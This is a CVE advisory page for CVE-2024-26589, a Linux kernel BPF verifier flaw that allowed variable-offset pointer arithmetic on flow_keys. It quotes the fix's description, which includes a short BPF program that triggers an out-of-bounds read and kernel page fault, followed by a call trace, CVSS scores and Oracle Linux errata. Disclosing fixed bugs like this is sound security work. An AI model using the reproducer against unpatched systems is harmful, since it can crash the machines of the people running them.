CVE-2024-26589

CVE Details

Release Date:

2024-02-22

Description

In the Linux kernel, the following vulnerability has been resolved:\nbpf: Reject variable offset alu on PTR_TO_FLOW_KEYS\nFor PTR_TO_FLOW_KEYS, check_flow_keys_access() only uses fixed off\nfor validation. However, variable offset ptr alu is not prohibited\nfor this ptr kind. So the variable offset is not checked.\nThe following prog is accepted:\nfunc#0 @0\n0: R1=ctx() R10=fp0\n0: (bf) r6 = r1 ; R1=ctx() R6_w=ctx()\n1: (79) r7 = *(u64 *)(r6 +144) ; R6_w=ctx() R7_w=flow_keys()\n2: (b7) r8 = 1024 ; R8_w=1024\n3: (37) r8 /= 1 ; R8_w=scalar()\n4: (57) r8 &= 1024 ; R8_w=scalar(smin=smin32=0,\nsmax=umax=smax32=umax32=1024,var_off=(0x0; 0x400))\n5: (0f) r7 += r8\nmark_precise: frame0: last_idx 5 first_idx 0 subseq_idx -1\nmark_precise: frame0: regs=r8 stack= before 4: (57) r8 &= 1024\nmark_precise: frame0: regs=r8 stack= before 3: (37) r8 /= 1\nmark_precise: frame0: regs=r8 stack= before 2: (b7) r8 = 1024\n6: R7_w=flow_keys(smin=smin32=0,smax=umax=smax32=umax32=1024,var_off\n=(0x0; 0x400)) R8_w=scalar(smin=smin32=0,smax=umax=smax32=umax32=1024,\nvar_off=(0x0; 0x400))\n6: (79) r0 = *(u64 *)(r7 +0) ; R0_w=scalar()\n7: (95) exit\nThis prog loads flow_keys to r7, and adds the variable offset r8\nto r7, and finally causes out-of-bounds access:\nBUG: unable to handle page fault for address: ffffc90014c80038\n[...]\nCall Trace:\n\nbpf_dispatcher_nop_func include/linux/bpf.h:1231 [inline]\n__bpf_prog_run include/linux/filter.h:651 [inline]\nbpf_prog_run include/linux/filter.h:658 [inline]\nbpf_prog_run_pin_on_cpu include/linux/filter.h:675 [inline]\nbpf_flow_dissect+0x15f/0x350 net/core/flow_dissector.c:991\nbpf_prog_test_run_flow_dissector+0x39d/0x620 net/bpf/test_run.c:1359\nbpf_prog_test_run kernel/bpf/syscall.c:4107 [inline]\n__sys_bpf+0xf8f/0x4560 kernel/bpf/syscall.c:5475\n__do_sys_bpf kernel/bpf/syscall.c:5561 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5559 [inline]\n__x64_sys_bpf+0x73/0xb0 kernel/bpf/syscall.c:5559\ndo_syscall_x64 arch/x86/entry/common.c:52 [inline]\ndo_syscall_64+0x3f/0x110 arch/x86/entry/common.c:83\nentry_SYSCALL_64_after_hwframe+0x63/0x6b\nFix this by rejecting ptr alu with variable offset on flow_keys.\nApplying the patch rejects the program with 'R7 pointer arithmetic\non flow_keys prohibited'.

See more information about CVE-2024-26589 from MITRE CVE dictionary and NIST NVD

CVSS Scoring

NOTE: The following CVSS v3.1 metrics and score provided are preliminary and subject to review.

Base Score:	4.1	CVSS Vector:	CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H
Attack Vector:	Local network	Attack Complexity:	High
Privileges Required:	High	User Interaction:	None
Scope:	Unchanged	Confidentiality Impact:	None
Integrity Impact:	None	Availability Impact:	High

Errata information

Platform	Errata	Release Date
Oracle Linux version 9 (kernel)	ELSA-2024-9315	2024-11-14